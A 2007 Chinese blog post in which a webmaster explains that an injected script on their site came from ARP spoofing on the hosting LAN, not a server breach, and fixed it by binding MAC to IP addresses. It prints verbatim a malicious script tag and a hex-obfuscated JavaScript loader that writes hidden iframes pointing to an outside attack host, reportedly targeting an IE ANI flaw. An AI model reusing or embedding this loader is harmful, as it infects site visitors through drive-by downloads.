网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
js的2种继承方式详解
Mar 04 Javascript
NODE.JS加密模块CRYPTO常用方法介绍
Jun 05 Javascript
Javascript 中创建自定义对象的方法汇总
Dec 04 Javascript
详解Angualr 组件间通信
Jan 21 Javascript
Vue+axios 实现http拦截及路由拦截实例
Apr 25 Javascript
ligerUI的ligerDialog关闭刷新的方法
Sep 27 Javascript
vue中根据时间戳判断对应的时间(今天 昨天 前天)
Dec 20 Javascript
jQuery实现移动端扭蛋机抽奖
Nov 08 jQuery
javascript this指向相关问题及改变方法
Nov 19 Javascript
vue中watch的用法汇总
Dec 28 Vue.js
element-ui 弹窗组件封装的步骤
Jan 22 Javascript
WebStorm无法正确识别Vue3组合式API的解决方案
Feb 18 Vue.js
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
PHP调用三种数据库的方法(3)
2006/10/09 PHP
Linux下实现PHP多进程的方法分享
2012/08/16 PHP
php标签云的实现代码
2012/10/10 PHP
php启用zlib压缩文件的配置方法
2013/06/12 PHP
PHP多维数组遍历方法(2种实现方法)
2015/12/10 PHP
php把文件设置为插件的技巧方法
2020/02/03 PHP
jQuery 关于伪类选择符的使用说明
2013/04/24 Javascript
jquery事件重复绑定的快速解决方法
2014/01/03 Javascript
jquery中页面Ajax方法$.load的功能使用介绍
2014/10/20 Javascript
在JavaScript中操作时间之getUTCDate()方法的使用
2015/06/10 Javascript
javascript拖拽效果延伸学习
2016/04/04 Javascript
jQuery unbind 删除绑定事件详解
2016/05/24 Javascript
js拖拽功能实现代码解析
2016/11/28 Javascript
Vue中添加过渡效果的方法
2017/03/16 Javascript
微信web端后退强制刷新功能的实现代码
2018/03/04 Javascript
React路由管理之React Router总结
2018/05/10 Javascript
JS判断两个数组或对象是否相同的方法示例
2019/02/28 Javascript
微信小程序日历弹窗选择器代码实例
2019/05/09 Javascript
让mocha支持ES6模块的方法实现
2020/01/14 Javascript
详解Python中DOM方法的动态性
2015/04/11 Python
python中threading超线程用法实例分析
2015/05/16 Python
Python生成8位随机字符串的方法分析
2017/12/05 Python
Python实现改变与矩形橡胶的线条的颜色代码示例
2018/01/05 Python
Python针对给定列表中元素进行翻转操作的方法分析
2018/04/27 Python
Python企业编码生成系统总体系统设计概述
2019/07/26 Python
python 发送json数据操作实例分析
2019/10/15 Python
Python FtpLib模块应用操作详解
2019/12/12 Python
Python多线程通信queue队列用法实例分析
2020/03/24 Python
css3实现超立体3D图片侧翻倾斜效果
2014/04/16 HTML / CSS
css 如何让背景图片拉伸填充避免重复显示
2013/07/11 HTML / CSS
利用纯html5绘制出来的一款非常漂亮的时钟
2015/01/04 HTML / CSS
一份教室追逐打闹的检讨书
2014/09/27 职场文书
普通党员群众路线教育实践活动心得体会
2014/11/04 职场文书
Nginx已编译的nginx-添加新模块
2021/04/01 Servers
Python保存并浏览用户的历史记录
2022/04/29 Python
Spring Boot 的创建和运行示例代码详解
2022/07/23 Java/Android